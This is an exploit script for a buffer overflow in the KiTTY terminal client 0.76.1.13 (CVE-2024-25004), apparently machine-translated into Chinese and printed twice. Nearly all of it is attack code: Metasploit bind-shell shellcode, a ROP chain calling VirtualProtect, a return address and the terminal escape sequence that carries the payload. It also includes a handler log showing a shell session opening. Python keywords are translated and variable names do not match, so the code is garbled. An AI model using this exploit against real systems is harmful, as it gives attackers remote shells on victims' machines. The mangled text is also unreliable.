#利用title: kitty 0.76.1.13-'启动重复会话用户名'缓冲区溢出
#利用作者: DeFcesco(Austin A. Defrancesco)
#供应商homepage: https://github.com/cyd01/kitty/=
#软件link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
#版本:≤0.76.1.13
#测试在: Microsoft Windows 11/10/8/7/XP
#CVE: CVE-2024-25004
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(Windows/shell_bind_tcp)to_handler#
#[*]有效载荷处理程序开始为作业1#
#MSF6有效载荷(Windows/shell_bind_tcp)#
#[*]开始绑定TCP处理程序,与192.168.100.28:444#
#[*]命令Shell会话1打开(192.168.100.119:34285-192.168.100.283:444)#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
导入系统
导入操作系统
导入结构
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#msf6有效载荷(Windows/shell_bind_tcp)生成-b'\ x00 \ x07 \ x0a \ x0a \ x0d \ x1b \ x9c'-f py##
#Windows/shell_bind_tcp -355字节#
#https://metasploit.com/#
#encoder: x86/shikata_ga_nai#
#verbose=false,lport=4444,rhost=192.168.100.28,#
#prependmigrate=false,exitfunc=process,createSession=true,#
#autoverifySession=true#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
buf=b''
buf +=b'\ xd9 \ xe9 \ xd9 \ x74 \ x24 \ xf4 \ xbd \ xbd \ xfe \ xb7 \ xb7 \ xa4 \ xa4 \ x99 \ x5e'
buf +=b'\ x29 \ xc9 \ xb1 \ x53 \ x83 \ xee \ xfc \ xfc \ x31 \ x6e \ x6e \ x13 \ x13 \ x03 \ x90'
buf +=b'\ xa4 \ x46 \ x6c \ x90 \ x23 \ x04 \ x8f \ x68 \ xb4 \ xb4 \ x69 \ x19 \ x19 \ x8d'
buf +=b'\ x85 \ xa9 \ x7d \ xc6 \ xb6 \ x19 \ xf5 \ xf5 \ x8a \ x3a \ x3a \ xd1 \ xd1 \ x5b \ x3e''
buf +=b'\ xc8 \ x97 \ x73 \ x31 \ x79 \ x1d \ x1d \ xa2 \ x7c \ x7a \ x7a \ x0e \ x0e \ x96 \ x1f'
buf +=b'\ xf8 \ x4d \ xcb \ xff \ xf \ xc1 \ x9d \ x1e \ xfe \ xfe \ x06 \ xc3 \ xc3 \ xd3 \ x52'
buf +=b'\ xde \ x8f \ x46 \ x42 \ x6b \ xc5 \ x5a \ x5a \ xe9 \ x27 \ x27 \ xcb \ xda \ xda \ x0e'
buf +=b'\ xff \ xea \ xcb \ x81 \ x8b \ xb4 \ xcb \ xcb \ x20 \ x5f \ xcd \ xcd \ x45 \ x3a''
buf +=b'\ xbc \ xe8 \ x1c \ xb1 \ x76 \ x86 \ x9e \ x9e \ x13 \ x47 \ x47 \ x67 \ x67 \ x0c \ x5a''
buf +=b'\ x67 \ x9a \ x4c \ x9b \ x40 \ x45 \ x3b \ x3b \ xd5 \ xb2 \ xb2 \ xf8 \ x3c \ x3c \ x22'
buf +=b'\ xc8 \ x26 \ xc8 \ xb0 \ x6a \ xac \ x6a \ x6a \ x1c \ x8a \ x8a \ x61 \ x61 \ xec \ xd7'
buf +=b'\ x80 \ xce \ x7a \ xbf \ x84 \ xd1 \ xaf \ xb4 \ xb4 \ xb1 \ x5a \ x5a \ x4e \ x1a''
buf +=b'\ x30 \ x18 \ x75 \ xbe \ x18 \ xfa \ x14 \ x14 \ xe7 \ xc4 \ xc4 \ xad \ x29 \ xf7'
buf +=b'\ xa6 \ x12 \ x8c \ x7c \ x4a \ x46 \ x46 \ xbd \ xdf \ xdf \ x03 \ xab \ xab \ x8c \ x8c \ xdf'
buf +=b'\ xd3 \ xa3 \ x87 \ xac \ xe1 \ x6c \ x3c \ x3c \ x3a \ x4a \ x4a \ xe4 \ xe4 \ x9a \ xbd'
buf +=b'\ xad \ xdf \ x5b \ x51 \ x50 \ xe0 \ x9b \ x78 \ x78 \ x97 \ xb4 \ xb4 \ xcb \ xcb \ x12'
buf +=b'\ x3e \ xb5 \ x87 \ xe2 \ xbf \ x60 \ x3d \ x3d \ xea \ x66 \ x66 \ xdb \ x20 \ x17'
buf +=b'\ xd8 \ x8b \ xe4 \ xb7 \ xb1 \ xc1 \ xea \ xea \ xe8 \ xa2 \ xe9 \ xe9 \ x20 \ x81'
buf +=b'\ x4b \ x14 \ xcb \ xbc \ xd7 \ x91 \ x2d \ x2d \ xd4 \ xf7 \ xf7 \ xf7 \ xf7 \ xe6 \ x40'
buf +=b'\ x3a \ x2c \ x3f \ xf7 \ x45 \ x06 \ x17 \ x17 \ x9f \ x0e \ x40 \ x40 \ xa0 \ xa0 \ xa0'
buf +=b'\ x8e \ x46 \ x86 \ x36 \ x05 \ x85 \ x85 \ x12 \ x27 \ x1a \ x1a \ x80 \ x80 \ x32 \ x30'
buf +=b'\ x8d \ x5e \ xd3 \ x73 \ x2f \ x5e \ xfe \ xfe \ xe3 \ xcc \ xcd \ xcd \ x65 \ x65 \ xf3'
buf +=b'\ x9b \ xed \ x31 \ xa4 \ xcc \ xc0 \ x4b \ x4b \ x20 \ xe1 \ x7b \ x7b \ xe2 \ x56'
buf +=b'\ xf8 \ x1a \ xcd \ xd2 \ xd2 \ x27 \ xdf \ xd0 \ xdb \ xdb \ xaa \ x5b \ x5b \ xf7 \ xf7 \ xcb'
buf +=b'\ x72 \ x63 \ xb3 \ xbf \ x2a \ x32 \ x6d \ x6d \ x69 \ x8d \ x8d \ xec \ xdf \ xdf \ xc3'
buf +=b'\ x47 \ x42 \ xb6 \ x83 \ x1e \ xa8 \ x09 \ xd5 \ xd5 \ x1e \ xe5 \ xe5 \ xff \ xff \ x39'
buf +=b'\ xae \ x50 \ x46 \ x46 \ x1f \ x35 \ x4e \ x4e \ x3f \ x7d \ xa5 \ xa5 \ xb1 \ xb1 \ xea'
buf +=b'\ xc5 \ xd5 \ xfb \ xb6 \ x6c \ x7e \ xa2 \ x23 \ x2d \ x2d \ xe3 \ xe3 \ x55 \ x9e'''
buf +=b'\ x72 \ x1a \ xd6 \ x2a \ x0b \ xd9 \ xc6 \ xc6 \ x5f \ x0e \ xa5 \ xa5 \ x40 \ x40 \ x8c'
buf +=b'\ x62 \ xb6 \ x24 \ xb2 \ xd1 \ xb7 \ x6c'
def shellCode():
SC=B''
sc +=b'\ xbb \ x44 \ x24 \ x44 \ x44'#mov ebx,0x4444424444
sc +=b'\ xb8 \ x44 \ x44 \ x44 \ x44'#mov eax,0x4444444444444
sc +=b'\ x29 \ xd8'#sub eax,ebx
sc +=b'\ x29 \ xc4'#sub esp,eax
sc +=buf
sc +=b'\ x90' *(1042-len(sc))
断言Len(SC)==1042
返回SC
def create_rop_chain():
#由mona.py生成的rop链-www.corelan.be
rop_gadgets=[
#[--- INFO:GADGETS_TO_SET_ESI: ---]
0x004c5832,#pop eax#添加ESP,14#pop ebx#pop esi#retn [kitty.exe]
0x006424a4,#ptr to virtualProtect()[iat kitty.exe]
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x00484E07,#MOV EAX,DWORD PTR DS: [EAX]#retn [Kitty.exe]
0x00473cf6,#xchg eax,esi#retn [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBP: ---]
0x00429953,#pop ebp#retn [kitty.exe]
0x005405b0,#PUSH ESP; retn 0 [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBX: ---]
0x0049d9f9,#pop ebx#retn [kitty.exe]
0x00000201,#0x00000201- EBX
#[--- INFO:GADGETS_TO_SET_EDX: ---]
0x00430dce,#pop edx#retn [kitty.exe]
0x00000040,#0x00000040- EDX
#[--- INFO:GADGETS_TO_SET_ECX: ---]
0x005ac58c,#pop ecx#retn [kitty.exe]
0x004d81d9,#可写的位置[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EDI: ---]
0x004fa404,#pop edi#retn [kitty.exe]
0x005A2001,#retn(rop nop)[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EAX: ---]
0x004CD011,#POP EAX#POP EBX#retn [kitty.exe]
0x90909090,#nop
0x41414141,#填充(补偿)
#[--- INFO
USHAD: ---]
0x005dfbac,#pushad#retn [kitty.exe]
这是给出的
返回b''。join(struct.pack('i',), in rop_gadgets)
rop_chain=create_rop_chain()
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
#badchars: \ x00 \ x07 \ x0a \ x0d \ x1b \ x9c \ x9d##
#返回地址信息:0x00529720 : {pivot 324 /0x144} :#
#添加ESP,134#POP EBX#POP ESI#POP EDI#POP EBP#retn#
#** [kitty.exe] ** | startnull {page_execute_readwrite}#
#ESP: 1042字节#的shellCode大小#
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
return_address=struct.pack('i',0x00529720)#添加ESP,134#POP EBX#POP ESI#POP EDI#POP EDI#POP EBP#retn ** [KITTY.EXE] ** | startnull {page_execute_readwrite}
rop_chain_padding=b'\ x90' * 27
nops=b'\ x90' * 88
Escape_sequence=B'\ 033] 0; __ dt:localhost:' + shellCode() + return_address
evase_sequence +=rop_chain_padding + rop_chain
Escape_Sequence +=B'\ Xe9 \ X3D \ Xfa \ XFF \ XFF'#JMP $ EIP-1471
Escape_sequence +=NOPS + B'\ 007'
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()
#利用作者: DeFcesco(Austin A. Defrancesco)
#供应商homepage: https://github.com/cyd01/kitty/=
#软件link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
#版本:≤0.76.1.13
#测试在: Microsoft Windows 11/10/8/7/XP
#CVE: CVE-2024-25004
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(Windows/shell_bind_tcp)to_handler#
#[*]有效载荷处理程序开始为作业1#
#MSF6有效载荷(Windows/shell_bind_tcp)#
#[*]开始绑定TCP处理程序,与192.168.100.28:444#
#[*]命令Shell会话1打开(192.168.100.119:34285-192.168.100.283:444)#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
导入系统
导入操作系统
导入结构
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#msf6有效载荷(Windows/shell_bind_tcp)生成-b'\ x00 \ x07 \ x0a \ x0a \ x0d \ x1b \ x9c'-f py##
#Windows/shell_bind_tcp -355字节#
#https://metasploit.com/#
#encoder: x86/shikata_ga_nai#
#verbose=false,lport=4444,rhost=192.168.100.28,#
#prependmigrate=false,exitfunc=process,createSession=true,#
#autoverifySession=true#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
buf=b''
buf +=b'\ xd9 \ xe9 \ xd9 \ x74 \ x24 \ xf4 \ xbd \ xbd \ xfe \ xb7 \ xb7 \ xa4 \ xa4 \ x99 \ x5e'
buf +=b'\ x29 \ xc9 \ xb1 \ x53 \ x83 \ xee \ xfc \ xfc \ x31 \ x6e \ x6e \ x13 \ x13 \ x03 \ x90'
buf +=b'\ xa4 \ x46 \ x6c \ x90 \ x23 \ x04 \ x8f \ x68 \ xb4 \ xb4 \ x69 \ x19 \ x19 \ x8d'
buf +=b'\ x85 \ xa9 \ x7d \ xc6 \ xb6 \ x19 \ xf5 \ xf5 \ x8a \ x3a \ x3a \ xd1 \ xd1 \ x5b \ x3e''
buf +=b'\ xc8 \ x97 \ x73 \ x31 \ x79 \ x1d \ x1d \ xa2 \ x7c \ x7a \ x7a \ x0e \ x0e \ x96 \ x1f'
buf +=b'\ xf8 \ x4d \ xcb \ xff \ xf \ xc1 \ x9d \ x1e \ xfe \ xfe \ x06 \ xc3 \ xc3 \ xd3 \ x52'
buf +=b'\ xde \ x8f \ x46 \ x42 \ x6b \ xc5 \ x5a \ x5a \ xe9 \ x27 \ x27 \ xcb \ xda \ xda \ x0e'
buf +=b'\ xff \ xea \ xcb \ x81 \ x8b \ xb4 \ xcb \ xcb \ x20 \ x5f \ xcd \ xcd \ x45 \ x3a''
buf +=b'\ xbc \ xe8 \ x1c \ xb1 \ x76 \ x86 \ x9e \ x9e \ x13 \ x47 \ x47 \ x67 \ x67 \ x0c \ x5a''
buf +=b'\ x67 \ x9a \ x4c \ x9b \ x40 \ x45 \ x3b \ x3b \ xd5 \ xb2 \ xb2 \ xf8 \ x3c \ x3c \ x22'
buf +=b'\ xc8 \ x26 \ xc8 \ xb0 \ x6a \ xac \ x6a \ x6a \ x1c \ x8a \ x8a \ x61 \ x61 \ xec \ xd7'
buf +=b'\ x80 \ xce \ x7a \ xbf \ x84 \ xd1 \ xaf \ xb4 \ xb4 \ xb1 \ x5a \ x5a \ x4e \ x1a''
buf +=b'\ x30 \ x18 \ x75 \ xbe \ x18 \ xfa \ x14 \ x14 \ xe7 \ xc4 \ xc4 \ xad \ x29 \ xf7'
buf +=b'\ xa6 \ x12 \ x8c \ x7c \ x4a \ x46 \ x46 \ xbd \ xdf \ xdf \ x03 \ xab \ xab \ x8c \ x8c \ xdf'
buf +=b'\ xd3 \ xa3 \ x87 \ xac \ xe1 \ x6c \ x3c \ x3c \ x3a \ x4a \ x4a \ xe4 \ xe4 \ x9a \ xbd'
buf +=b'\ xad \ xdf \ x5b \ x51 \ x50 \ xe0 \ x9b \ x78 \ x78 \ x97 \ xb4 \ xb4 \ xcb \ xcb \ x12'
buf +=b'\ x3e \ xb5 \ x87 \ xe2 \ xbf \ x60 \ x3d \ x3d \ xea \ x66 \ x66 \ xdb \ x20 \ x17'
buf +=b'\ xd8 \ x8b \ xe4 \ xb7 \ xb1 \ xc1 \ xea \ xea \ xe8 \ xa2 \ xe9 \ xe9 \ x20 \ x81'
buf +=b'\ x4b \ x14 \ xcb \ xbc \ xd7 \ x91 \ x2d \ x2d \ xd4 \ xf7 \ xf7 \ xf7 \ xf7 \ xe6 \ x40'
buf +=b'\ x3a \ x2c \ x3f \ xf7 \ x45 \ x06 \ x17 \ x17 \ x9f \ x0e \ x40 \ x40 \ xa0 \ xa0 \ xa0'
buf +=b'\ x8e \ x46 \ x86 \ x36 \ x05 \ x85 \ x85 \ x12 \ x27 \ x1a \ x1a \ x80 \ x80 \ x32 \ x30'
buf +=b'\ x8d \ x5e \ xd3 \ x73 \ x2f \ x5e \ xfe \ xfe \ xe3 \ xcc \ xcd \ xcd \ x65 \ x65 \ xf3'
buf +=b'\ x9b \ xed \ x31 \ xa4 \ xcc \ xc0 \ x4b \ x4b \ x20 \ xe1 \ x7b \ x7b \ xe2 \ x56'
buf +=b'\ xf8 \ x1a \ xcd \ xd2 \ xd2 \ x27 \ xdf \ xd0 \ xdb \ xdb \ xaa \ x5b \ x5b \ xf7 \ xf7 \ xcb'
buf +=b'\ x72 \ x63 \ xb3 \ xbf \ x2a \ x32 \ x6d \ x6d \ x69 \ x8d \ x8d \ xec \ xdf \ xdf \ xc3'
buf +=b'\ x47 \ x42 \ xb6 \ x83 \ x1e \ xa8 \ x09 \ xd5 \ xd5 \ x1e \ xe5 \ xe5 \ xff \ xff \ x39'
buf +=b'\ xae \ x50 \ x46 \ x46 \ x1f \ x35 \ x4e \ x4e \ x3f \ x7d \ xa5 \ xa5 \ xb1 \ xb1 \ xea'
buf +=b'\ xc5 \ xd5 \ xfb \ xb6 \ x6c \ x7e \ xa2 \ x23 \ x2d \ x2d \ xe3 \ xe3 \ x55 \ x9e'''
buf +=b'\ x72 \ x1a \ xd6 \ x2a \ x0b \ xd9 \ xc6 \ xc6 \ x5f \ x0e \ xa5 \ xa5 \ x40 \ x40 \ x8c'
buf +=b'\ x62 \ xb6 \ x24 \ xb2 \ xd1 \ xb7 \ x6c'
def shellCode():
SC=B''
sc +=b'\ xbb \ x44 \ x24 \ x44 \ x44'#mov ebx,0x4444424444
sc +=b'\ xb8 \ x44 \ x44 \ x44 \ x44'#mov eax,0x4444444444444
sc +=b'\ x29 \ xd8'#sub eax,ebx
sc +=b'\ x29 \ xc4'#sub esp,eax
sc +=buf
sc +=b'\ x90' *(1042-len(sc))
断言Len(SC)==1042
返回SC
def create_rop_chain():
#由mona.py生成的rop链-www.corelan.be
rop_gadgets=[
#[--- INFO:GADGETS_TO_SET_ESI: ---]
0x004c5832,#pop eax#添加ESP,14#pop ebx#pop esi#retn [kitty.exe]
0x006424a4,#ptr to virtualProtect()[iat kitty.exe]
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x00484E07,#MOV EAX,DWORD PTR DS: [EAX]#retn [Kitty.exe]
0x00473cf6,#xchg eax,esi#retn [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBP: ---]
0x00429953,#pop ebp#retn [kitty.exe]
0x005405b0,#PUSH ESP; retn 0 [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBX: ---]
0x0049d9f9,#pop ebx#retn [kitty.exe]
0x00000201,#0x00000201- EBX
#[--- INFO:GADGETS_TO_SET_EDX: ---]
0x00430dce,#pop edx#retn [kitty.exe]
0x00000040,#0x00000040- EDX
#[--- INFO:GADGETS_TO_SET_ECX: ---]
0x005ac58c,#pop ecx#retn [kitty.exe]
0x004d81d9,#可写的位置[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EDI: ---]
0x004fa404,#pop edi#retn [kitty.exe]
0x005A2001,#retn(rop nop)[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EAX: ---]
0x004CD011,#POP EAX#POP EBX#retn [kitty.exe]
0x90909090,#nop
0x41414141,#填充(补偿)
#[--- INFO
USHAD: ---]0x005dfbac,#pushad#retn [kitty.exe]
这是给出的
返回b''。join(struct.pack('i',), in rop_gadgets)
rop_chain=create_rop_chain()
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
#badchars: \ x00 \ x07 \ x0a \ x0d \ x1b \ x9c \ x9d##
#返回地址信息:0x00529720 : {pivot 324 /0x144} :#
#添加ESP,134#POP EBX#POP ESI#POP EDI#POP EBP#retn#
#** [kitty.exe] ** | startnull {page_execute_readwrite}#
#ESP: 1042字节#的shellCode大小#
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
return_address=struct.pack('i',0x00529720)#添加ESP,134#POP EBX#POP ESI#POP EDI#POP EDI#POP EBP#retn ** [KITTY.EXE] ** | startnull {page_execute_readwrite}
rop_chain_padding=b'\ x90' * 27
nops=b'\ x90' * 88
Escape_sequence=B'\ 033] 0; __ dt:localhost:' + shellCode() + return_address
evase_sequence +=rop_chain_padding + rop_chain
Escape_Sequence +=B'\ Xe9 \ X3D \ Xfa \ XFF \ XFF'#JMP $ EIP-1471
Escape_sequence +=NOPS + B'\ 007'
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()